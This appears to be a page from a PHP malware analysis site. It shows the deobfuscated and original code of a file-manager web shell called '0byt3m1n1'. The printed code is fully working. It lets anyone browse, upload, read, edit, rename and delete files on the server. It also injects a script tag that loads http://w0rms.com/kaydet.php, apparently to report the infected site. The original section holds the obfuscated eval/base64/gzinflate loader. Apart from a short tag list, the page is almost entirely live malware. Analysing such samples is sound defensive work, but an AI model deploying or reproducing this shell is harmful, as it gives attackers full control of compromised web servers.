PHP Malware Analysis

Back to list

Filename: 20.php

Tags

URLs
Title
  • 0byt3m1n1
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • getcwd
Files
  • file_get_contents
  • copy

Deobfuscated code

<?php

//w0rms.com shell secure
$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$r57txt = "==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";
eval /* PHPDeobfuscator eval output */ {
    echo "<script src=http://w0rms.com/kaydet.php></script>";
    set_time_limit(0);
    error_reporting(0);
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    ?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php 
    echo "<div style=\"color:#ef6c00;margin-top:0;\"><h1><center>0byt3m1n1</center></h1></div>";
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
        chdir($_GET['path']);
    } else {
        $path = getcwd();
    }
    $path = str_replace("\\", "/", $path);
    $paths = explode("/", $path);
    echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
    echo "<font style='font-size:13px;'>Path: ";
    foreach ($paths as $id => $pat) {
        echo "<a style='font-size:13px;' href='?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo $paths[$i];
            if ($i != $id) {
                echo "/";
            }
        }
        echo "'>{$pat}</a>/";
    }
    echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/>\r\n<input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<center><font color=\"#00ff00\">Upload OK!.</font></center><br/>";
        } else {
            echo "<center><font color=\"red\">Upload Failed!.</font></center><br/>";
        }
    }
    echo "</td></tr><tr><td></table>";
    if (isset($_GET['filesrc'])) {
        echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
        echo "" . basename($_GET['filesrc']);
        "";
        echo "</tr></td></table><br />";
        echo "<center><textarea readonly=''>" . htmlspecialchars(file_get_contents($_GET['filesrc'])) . "</textarea></center>";
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        if ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
                }
                fclose($fp);
            }
            echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
        }
        echo "</center>";
    } else {
        echo "</table><br /><center>";
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if (rmdir($_POST['path'])) {
                    echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
                }
            } elseif ($_POST['type'] == 'file') {
                if (unlink($_POST['path'])) {
                    echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Delete File Error.</font><br />";
                }
            }
        }
        echo "</center>";
        $scandir = scandir($path);
        echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\">\r\n<th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th>\r\n<th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
        foreach ($scandir as $dir) {
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
            echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
        }
        foreach ($scandir as $file) {
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
            echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
        }
        echo "</table></div>";
    }
    echo "</body></html>";
    function perms($file)
    {
        $perms = fileperms($file);
        if (($perms & 0xc000) == 0xc000) {
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            $info = 'p';
        } else {
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
    echo "<br><center>© 2017 - <a href=\"http://zerobyte.id/\">ZeroByte.ID</a> Recoded from Kodong.</center><br>";
};
$encodephp = "";
"";
exit;


Original code

<?php
//w0rms.com shell secure
$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$r57txt = "==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";
eval(htmlspecialchars_decode(urldecode(base64_decode($encoder57txt))));
$encodephp="";
base64_decode($encodephp);
exit;
?>